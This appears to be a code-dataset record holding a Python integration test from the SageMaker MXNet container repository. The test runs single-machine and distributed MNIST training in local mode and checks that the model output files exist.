return (BCE_loss + KLD)/X.numel()
| 38.901408
| 156
| 0.58445
|
0b46d45c4c153c8f5beb5fd039fd957847f7b7cd
| 2,406
|
py
|
Python
|
test/integration/local/test_mnist_training.py
|
leezu/sagemaker-mxnet-container
|
578c8df7817b5361ee568dbf8e99659432fbf729
|
[
"Apache-2.0"
] | null | null | null |
test/integration/local/test_mnist_training.py
|
leezu/sagemaker-mxnet-container
|
578c8df7817b5361ee568dbf8e99659432fbf729
|
[
"Apache-2.0"
] | 1
|
2020-02-19T03:03:35.000Z
|
2020-02-19T03:03:35.000Z
|
test/integration/local/test_mnist_training.py
|
leezu/sagemaker-mxnet-container
|
578c8df7817b5361ee568dbf8e99659432fbf729
|
[
"Apache-2.0"
] | 1
|
2019-09-17T02:03:44.000Z
|
2019-09-17T02:03:44.000Z
|
# Copyright 2018-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
from __future__ import absolute_import
import os
import pytest
from sagemaker.mxnet import MXNet
import local_mode_utils
from test.integration import MODEL_SUCCESS_FILES, RESOURCE_PATH
MNIST_PATH = os.path.join(RESOURCE_PATH, 'mnist')
SCRIPT_PATH = os.path.join(MNIST_PATH, 'mnist.py')
TRAIN_INPUT = 'file://{}'.format(os.path.join(MNIST_PATH, 'train'))
TEST_INPUT = 'file://{}'.format(os.path.join(MNIST_PATH, 'test'))
def test_single_machine(docker_image, sagemaker_local_session, local_instance_type,
framework_version, tmpdir):
mx = MXNet(entry_point=SCRIPT_PATH, role='SageMakerRole', train_instance_count=1,
train_instance_type=local_instance_type, sagemaker_session=sagemaker_local_session,
image_name=docker_image, framework_version=framework_version,
output_path='file://{}'.format(tmpdir))
_train_and_assert_success(mx, str(tmpdir))
def test_distributed(docker_image, sagemaker_local_session, framework_version, processor, tmpdir):
if processor == 'gpu':
pytest.skip('Local Mode does not support distributed training on GPU.')
mx = MXNet(entry_point=SCRIPT_PATH, role='SageMakerRole', train_instance_count=2,
train_instance_type='local', sagemaker_session=sagemaker_local_session,
image_name=docker_image, framework_version=framework_version,
output_path='file://{}'.format(tmpdir),
hyperparameters={'sagemaker_parameter_server_enabled': True})
_train_and_assert_success(mx, str(tmpdir))
def _train_and_assert_success(estimator, output_path):
estimator.fit({'train': TRAIN_INPUT, 'test': TEST_INPUT})
for directory, files in MODEL_SUCCESS_FILES.items():
local_mode_utils.assert_output_files_exist(output_path, directory, files)
| 41.482759
| 98
| 0.743558
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.